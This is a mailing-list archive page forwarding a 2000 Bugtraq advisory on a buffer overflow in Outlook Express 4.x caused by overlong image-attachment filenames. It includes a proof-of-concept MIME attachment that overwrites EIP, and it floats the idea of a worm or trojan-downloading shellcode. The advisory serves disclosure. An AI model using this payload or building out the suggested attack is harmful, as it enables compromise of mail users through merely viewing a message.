[Esa-l] Overflow in Outlook Express 4.* - too long filenames with graphic format extension (fwd)

John D. Hardin jhardin at wolfenet.com
Sat May 13 16:33:23 PDT 2000 

And another...

---------- Forwarded message ----------
Date: Fri, 12 May 2000 14:05:28 +0200
From: Ultor <Ultor at HERT.ORG>
To: BUGTRAQ at SECURITYFOCUS.COM
Subject: Overflow in Outlook Express 4.* - too long filenames with graphic     
            format extension

==== APPLICATION AFFECTED

Outlook Express 4.* (5.* is not affected)

==== DESCRIPTION

All attached graphic files are automatically shown in the Outlook Express
while viewing the e-mail. The problem is that long filenames with *.jpg
*.bmp extension makes overflow if filename lenght is longer then 256
characters.

==== EXAMPLE

We need more than 267 characters to overwrite EIP cause of 'C:\TEMP' on the
begining of buffer. This makes little problem with exploitation. Here is
example of such e-mail

------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"

------=_NextPart_000_0008_01BF5479.70140740--

EIP is overwriten here by 'BBBB'.

==== EXPLOITATION

It's little hard to exploit it cause buffer is addressed in addr with '00'
and we got 'C:\TEMP' which overwrites stack before our data. You will need
some tricks to exploit this. I believe this bug could be very dangerous if
connected somehow with worm cause you would only have to view the message to
run the exploit. Using shellcode which downloads trojan from some URL on the
affected machine would be interesting idea too.


Greeetz to HERT,Lam3rZ,TESO

----------------------
Mark Bialoglowy [Ultor at hert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------

More information about the esd-l mailing list